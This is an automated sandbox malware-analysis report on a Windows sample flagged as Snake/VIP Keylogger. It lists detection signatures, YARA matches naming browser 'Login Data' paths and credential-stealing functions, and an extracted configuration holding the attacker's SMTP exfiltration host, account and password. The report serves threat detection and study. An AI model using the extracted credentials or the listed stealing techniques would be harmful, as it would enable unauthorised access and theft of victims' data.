Edit tour

Windows Analysis Report
YDg44STseR.exe

Overview

General Information

Sample name:	YDg44STseR.exe renamed because original name is a hash value
Original sample name:	c05ab375243499db0c1d595a6a7f4249e9831fb6b369ca1706aabac5b60a27a8.exe
Analysis ID:	1588582
MD5:	7455fa9cb790aba2a0b149337cd0629a
SHA1:	e7217859b464420f73bf0b16df32f5c5f2207a60
SHA256:	c05ab375243499db0c1d595a6a7f4249e9831fb6b369ca1706aabac5b60a27a8
Tags:	exeRedLineStealeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

YDg44STseR.exe (PID: 3352 cmdline: "C:\Users\user\Desktop\YDg44STseR.exe" MD5: 7455FA9CB790ABA2A0B149337CD0629A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "export@besemglda.com", "Password": "Lovelove@123", "Host": "mail.besemglda.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "export@besemglda.com", "Password": "Lovelove@123", "Host": "mail.besemglda.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
YDg44STseR.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 04 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35252:$a1: get_encryptedPassword 0x35226:$a2: get_encryptedUsername 0x352ea:$a3: get_timePasswordChanged 0x35202:$a4: get_passwordField 0x35268:$a5: set_encryptedPassword 0x35035:$a7: get_logins 0x30970:$a10: KeyLoggerEventArgs 0x3093f:$a11: KeyLoggerEventArgsEventHandler 0x35109:$a13: _encryptedPassword
00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e651:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ae:$a4: \Orbitum\User Data\Default\Login Data 0x3f28d:$a5: \Kometa\User Data\Default\Login Data
00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32de9:$s1: UnHook 0x32d85:$s2: SetHook 0x32dbe:$s3: CallNextHook 0x32d4d:$s4: _hook
00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x351e2:$a1: get_encryptedPassword 0x351b6:$a2: get_encryptedUsername 0x3527a:$a3: get_timePasswordChanged 0x35192:$a4: get_passwordField 0x351f8:$a5: set_encryptedPassword 0x34fc5:$a7: get_logins 0x30900:$a10: KeyLoggerEventArgs 0x308cf:$a11: KeyLoggerEventArgsEventHandler 0x35099:$a13: _encryptedPassword
00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36172:$a1: get_encryptedPassword 0x36146:$a2: get_encryptedUsername 0x3620a:$a3: get_timePasswordChanged 0x36122:$a4: get_passwordField 0x36188:$a5: set_encryptedPassword 0x35f55:$a7: get_logins 0x31890:$a10: KeyLoggerEventArgs 0x3185f:$a11: KeyLoggerEventArgsEventHandler 0x36029:$a13: _encryptedPassword
00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fece:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f571:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f7ce:$a4: \Orbitum\User Data\Default\Login Data 0x401ad:$a5: \Kometa\User Data\Default\Login Data
00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x76e30:$a1: get_encryptedPassword 0x76e04:$a2: get_encryptedUsername 0x76ec8:$a3: get_timePasswordChanged 0x76de0:$a4: get_passwordField 0x76e46:$a5: set_encryptedPassword 0x76c13:$a7: get_logins 0x7254e:$a10: KeyLoggerEventArgs 0x7251d:$a11: KeyLoggerEventArgsEventHandler 0x76ce7:$a13: _encryptedPassword
00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33d09:$s1: UnHook 0x33ca5:$s2: SetHook 0x33cde:$s3: CallNextHook 0x33c6d:$s4: _hook
Process Memory Space: YDg44STseR.exe PID: 3352	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: YDg44STseR.exe PID: 3352	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: YDg44STseR.exe PID: 3352	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: YDg44STseR.exe PID: 3352	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b8ba6:$a1: get_encryptedPassword 0x26f203:$a1: get_encryptedPassword 0x2a5f48:$a1: get_encryptedPassword 0x2d00b9:$a1: get_encryptedPassword 0x1b8b7a:$a2: get_encryptedUsername 0x26f1d7:$a2: get_encryptedUsername 0x2a5f1c:$a2: get_encryptedUsername 0x2d008d:$a2: get_encryptedUsername 0x1b8c3e:$a3: get_timePasswordChanged 0x26f29b:$a3: get_timePasswordChanged 0x2a5fe0:$a3: get_timePasswordChanged 0x2d0151:$a3: get_timePasswordChanged 0x1b8b56:$a4: get_passwordField 0x26f1b3:$a4: get_passwordField 0x2a5ef8:$a4: get_passwordField 0x2d0069:$a4: get_passwordField 0x1b8bbc:$a5: set_encryptedPassword 0x26f219:$a5: set_encryptedPassword 0x2a5f5e:$a5: set_encryptedPassword 0x2d00cf:$a5: set_encryptedPassword 0x1b8992:$a7: get_logins
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.YDg44STseR.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 04 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.YDg44STseR.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 04 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.YDg44STseR.exe.2590f20.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.YDg44STseR.exe.2590f20.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.YDg44STseR.exe.2590f20.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.YDg44STseR.exe.2590f20.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33652:$a1: get_encryptedPassword 0x33626:$a2: get_encryptedUsername 0x336ea:$a3: get_timePasswordChanged 0x33602:$a4: get_passwordField 0x33668:$a5: set_encryptedPassword 0x33435:$a7: get_logins 0x2ed70:$a10: KeyLoggerEventArgs 0x2ed3f:$a11: KeyLoggerEventArgsEventHandler 0x33509:$a13: _encryptedPassword
0.2.YDg44STseR.exe.2590f20.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d3ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ca51:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ccae:$a4: \Orbitum\User Data\Default\Login Data 0x3d68d:$a5: \Kometa\User Data\Default\Login Data
0.2.YDg44STseR.exe.2260bde.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.YDg44STseR.exe.2260bde.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.YDg44STseR.exe.2260bde.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.YDg44STseR.exe.2260bde.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33652:$a1: get_encryptedPassword 0x33626:$a2: get_encryptedUsername 0x336ea:$a3: get_timePasswordChanged 0x33602:$a4: get_passwordField 0x33668:$a5: set_encryptedPassword 0x33435:$a7: get_logins 0x2ed70:$a10: KeyLoggerEventArgs 0x2ed3f:$a11: KeyLoggerEventArgsEventHandler 0x33509:$a13: _encryptedPassword
0.2.YDg44STseR.exe.2590000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.YDg44STseR.exe.2590000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.YDg44STseR.exe.2590000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.YDg44STseR.exe.2590000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34372:$a1: get_encryptedPassword 0x34346:$a2: get_encryptedUsername 0x3440a:$a3: get_timePasswordChanged 0x34322:$a4: get_passwordField 0x34388:$a5: set_encryptedPassword 0x34155:$a7: get_logins 0x2fa90:$a10: KeyLoggerEventArgs 0x2fa5f:$a11: KeyLoggerEventArgsEventHandler 0x34229:$a13: _encryptedPassword
0.2.YDg44STseR.exe.2590000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e0ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d771:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d9ce:$a4: \Orbitum\User Data\Default\Login Data 0x3e3ad:$a5: \Kometa\User Data\Default\Login Data
0.2.YDg44STseR.exe.2590000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31f09:$s1: UnHook 0x31ea5:$s2: SetHook 0x31ede:$s3: CallNextHook 0x31e6d:$s4: _hook
0.2.YDg44STseR.exe.2590f20.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x311e9:$s1: UnHook 0x31185:$s2: SetHook 0x311be:$s3: CallNextHook 0x3114d:$s4: _hook
0.2.YDg44STseR.exe.2260bde.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d3ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ca51:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ccae:$a4: \Orbitum\User Data\Default\Login Data 0x3d68d:$a5: \Kometa\User Data\Default\Login Data
0.2.YDg44STseR.exe.225fcbe.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.YDg44STseR.exe.225fcbe.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.YDg44STseR.exe.225fcbe.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.YDg44STseR.exe.2260bde.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x311e9:$s1: UnHook 0x31185:$s2: SetHook 0x311be:$s3: CallNextHook 0x3114d:$s4: _hook
0.2.YDg44STseR.exe.225fcbe.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34372:$a1: get_encryptedPassword 0x34346:$a2: get_encryptedUsername 0x3440a:$a3: get_timePasswordChanged 0x34322:$a4: get_passwordField 0x34388:$a5: set_encryptedPassword 0x34155:$a7: get_logins 0x2fa90:$a10: KeyLoggerEventArgs 0x2fa5f:$a11: KeyLoggerEventArgsEventHandler 0x34229:$a13: _encryptedPassword
0.2.YDg44STseR.exe.225fcbe.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e0ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d771:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d9ce:$a4: \Orbitum\User Data\Default\Login Data 0x3e3ad:$a5: \Kometa\User Data\Default\Login Data
0.2.YDg44STseR.exe.225fcbe.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31f09:$s1: UnHook 0x31ea5:$s2: SetHook 0x31ede:$s3: CallNextHook 0x31e6d:$s4: _hook
0.2.YDg44STseR.exe.5120000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.YDg44STseR.exe.5120000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.YDg44STseR.exe.5120000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.YDg44STseR.exe.5120000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.YDg44STseR.exe.2590f20.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.YDg44STseR.exe.2590f20.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.YDg44STseR.exe.2590f20.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.YDg44STseR.exe.2590f20.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.YDg44STseR.exe.225fcbe.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.YDg44STseR.exe.225fcbe.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.YDg44STseR.exe.2590000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.YDg44STseR.exe.2590000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.YDg44STseR.exe.2590000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.YDg44STseR.exe.2590000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.YDg44STseR.exe.5120000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35252:$a1: get_encryptedPassword 0x35226:$a2: get_encryptedUsername 0x352ea:$a3: get_timePasswordChanged 0x35202:$a4: get_passwordField 0x35268:$a5: set_encryptedPassword 0x35035:$a7: get_logins 0x30970:$a10: KeyLoggerEventArgs 0x3093f:$a11: KeyLoggerEventArgsEventHandler 0x35109:$a13: _encryptedPassword
0.2.YDg44STseR.exe.5120000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e651:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ae:$a4: \Orbitum\User Data\Default\Login Data 0x3f28d:$a5: \Kometa\User Data\Default\Login Data
0.2.YDg44STseR.exe.225fcbe.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.YDg44STseR.exe.225fcbe.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.YDg44STseR.exe.225fcbe.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36172:$a1: get_encryptedPassword 0x36146:$a2: get_encryptedUsername 0x3620a:$a3: get_timePasswordChanged 0x36122:$a4: get_passwordField 0x36188:$a5: set_encryptedPassword 0x35f55:$a7: get_logins 0x31890:$a10: KeyLoggerEventArgs 0x3185f:$a11: KeyLoggerEventArgsEventHandler 0x36029:$a13: _encryptedPassword
0.2.YDg44STseR.exe.2260bde.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.YDg44STseR.exe.2260bde.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.YDg44STseR.exe.2260bde.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.YDg44STseR.exe.2260bde.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.YDg44STseR.exe.5120000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.YDg44STseR.exe.5120000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.YDg44STseR.exe.5120000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.YDg44STseR.exe.2590f20.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35252:$a1: get_encryptedPassword 0x35226:$a2: get_encryptedUsername 0x352ea:$a3: get_timePasswordChanged 0x35202:$a4: get_passwordField 0x35268:$a5: set_encryptedPassword 0x35035:$a7: get_logins 0x30970:$a10: KeyLoggerEventArgs 0x3093f:$a11: KeyLoggerEventArgsEventHandler 0x35109:$a13: _encryptedPassword
0.2.YDg44STseR.exe.5120000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32de9:$s1: UnHook 0x32d85:$s2: SetHook 0x32dbe:$s3: CallNextHook 0x32d4d:$s4: _hook
0.2.YDg44STseR.exe.2260bde.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35252:$a1: get_encryptedPassword 0x35226:$a2: get_encryptedUsername 0x352ea:$a3: get_timePasswordChanged 0x35202:$a4: get_passwordField 0x35268:$a5: set_encryptedPassword 0x35035:$a7: get_logins 0x30970:$a10: KeyLoggerEventArgs 0x3093f:$a11: KeyLoggerEventArgsEventHandler 0x35109:$a13: _encryptedPassword
0.2.YDg44STseR.exe.225fcbe.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fece:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f571:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f7ce:$a4: \Orbitum\User Data\Default\Login Data 0x401ad:$a5: \Kometa\User Data\Default\Login Data
0.2.YDg44STseR.exe.2590000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36172:$a1: get_encryptedPassword 0x36146:$a2: get_encryptedUsername 0x3620a:$a3: get_timePasswordChanged 0x36122:$a4: get_passwordField 0x36188:$a5: set_encryptedPassword 0x35f55:$a7: get_logins 0x31890:$a10: KeyLoggerEventArgs 0x3185f:$a11: KeyLoggerEventArgsEventHandler 0x36029:$a13: _encryptedPassword
0.2.YDg44STseR.exe.225fcbe.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33d09:$s1: UnHook 0x33ca5:$s2: SetHook 0x33cde:$s3: CallNextHook 0x33c6d:$s4: _hook
0.2.YDg44STseR.exe.5120000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33652:$a1: get_encryptedPassword 0x33626:$a2: get_encryptedUsername 0x336ea:$a3: get_timePasswordChanged 0x33602:$a4: get_passwordField 0x33668:$a5: set_encryptedPassword 0x33435:$a7: get_logins 0x2ed70:$a10: KeyLoggerEventArgs 0x2ed3f:$a11: KeyLoggerEventArgsEventHandler 0x33509:$a13: _encryptedPassword
0.2.YDg44STseR.exe.2260bde.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e651:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ae:$a4: \Orbitum\User Data\Default\Login Data 0x3f28d:$a5: \Kometa\User Data\Default\Login Data
0.2.YDg44STseR.exe.2590000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fece:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f571:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f7ce:$a4: \Orbitum\User Data\Default\Login Data 0x401ad:$a5: \Kometa\User Data\Default\Login Data
0.2.YDg44STseR.exe.2590000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33d09:$s1: UnHook 0x33ca5:$s2: SetHook 0x33cde:$s3: CallNextHook 0x33c6d:$s4: _hook
0.2.YDg44STseR.exe.2590f20.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e651:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ae:$a4: \Orbitum\User Data\Default\Login Data 0x3f28d:$a5: \Kometa\User Data\Default\Login Data
0.2.YDg44STseR.exe.2260bde.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32de9:$s1: UnHook 0x32d85:$s2: SetHook 0x32dbe:$s3: CallNextHook 0x32d4d:$s4: _hook
0.2.YDg44STseR.exe.5120000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d3ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ca51:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ccae:$a4: \Orbitum\User Data\Default\Login Data 0x3d68d:$a5: \Kometa\User Data\Default\Login Data
